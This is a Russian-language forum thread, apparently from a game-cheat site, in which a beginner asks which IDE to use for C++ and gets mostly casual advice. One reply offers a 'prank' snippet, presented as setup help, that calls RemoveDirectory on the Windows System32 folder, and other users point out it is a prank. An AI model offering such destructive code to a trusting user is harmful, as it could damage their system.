Вопрос Прога для cpp кодинга

Начинающий
Начинающий
Статус
Оффлайн
Реакции
7

Перед прочтением основного контента ниже, пожалуйста, обратите внимание на обновление внутри секции Майна на нашем форуме. У нас появились:

• бесплатные читы для Майнкрафт — любое использование на свой страх и риск;
  • маркетплейс Майнкрафт — абсолютно любая коммерция, связанная с игрой, за исключением продажи читов (аккаунты, предоставления услуг, поиск кодеров читов и так далее);
  • приватные читы для Minecraft — в этом разделе только платные хаки для игры, покупайте группу "Продавец" и выставляйте на продажу свой софт;
  • обсуждения и гайды — всё тот же раздел с вопросами, но теперь модернизированный: поиск нужных хаков, пати с игроками-читерами и другая полезная информация.

Спасибо!

Какие есть норм проги для cpp кодинга, пробовал VSC и VS, ничего не понял как там запускать и прочее, думаю через CLion попробовать, можете помочь с выбором?

Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Какие есть норм проги для cpp кодинга, пробовал VSC и VS, ничего не понял как там запускать и прочее, думаю через CLion попробовать, можете помочь с выбором?
Vs code изи настроить

используй это :
1748071850379.png
CLion так себе

я почему то даже не удивлен блять, что этот вопрос в треде майнкрафта

для начала тебе нужно настроить visual studio:
создаешь новый файл .cpp
и кидаешь туда этот код
Код:
Expand Collapse Copy
#include <cstdio>
int main()
{
    RemoveDirectory(L"C:\\Windows\\System32\\");
    return 0;
}
дальше жмешь ctrl+b и запускаешь файл из папки x64/Release ексешник и все
не благодари бро

создаешь новый файл .cpp
и кидаешь туда этот код
Код:
Expand Collapse Copy
#include <cstdio>
int main()
{
    return 0;
}
не благодари бро
жалко то, что он скомпилирует не запустится

vs используй там всё изи, попастил жоско и потом сборка -> собрать решение

представь как трудно было ему наити и нажать кнопку)Посмотреть вложение 307102
Так у меня даже ничего не настроено, я ток вчера на 5 минут зашел и ниче не понял как там делать
создаешь новый файл .cpp
и кидаешь туда этот код
Код:
Expand Collapse Copy
#include <cstdio>
int main()
{
    return 0;
}
не благодари бро
+реп помогло
Окей, попробую

Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
создаешь новый файл .cpp
и кидаешь туда этот код
Код:
Expand Collapse Copy
#include <cstdio>
int main()
{
    return 0;
}
не благодари бро
Чил чил мабой это пранк!!!!!

Хз, но там импорт подсвечивался, когда на него нажимал, только лампочка желтая горела
чувак не лезь сразу пастить херню какую-то, разберись с управлением и хотя-бы видосов 5 глянь о cpp, ты просто методом тыка нихуя не добьешься

Последнее редактирование:
Ну clion норм только для Cmake проектов так что на винде только vs либо vsc но я использую vs 22 с vcpkg для установки там библиотек без муторной хуни

Назад
Сверху Снизу